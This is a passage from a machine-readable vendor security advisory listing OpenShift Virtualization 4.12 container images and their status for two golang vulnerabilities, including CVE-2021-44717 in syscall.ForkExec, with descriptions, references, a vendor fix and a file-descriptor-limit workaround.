confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: limit growth of header canonicalization cache", }, { cve: "CVE-2021-44717", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030806", }, ], notes: [ { category: "description", text: "There's a flaw in golang's syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: don't close fd 0 on ForkExec error", title: "Vulnerability summary", }, { category: "other", text: "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw's impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44717", }, { category: "external", summary: "RHBZ#2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44717", url: "https://www.cve.org/CVERecord?id=CVE-2021-44717", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "workaround", details: "This bug can be mitigated by raising the per-process file descriptor limit.", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", 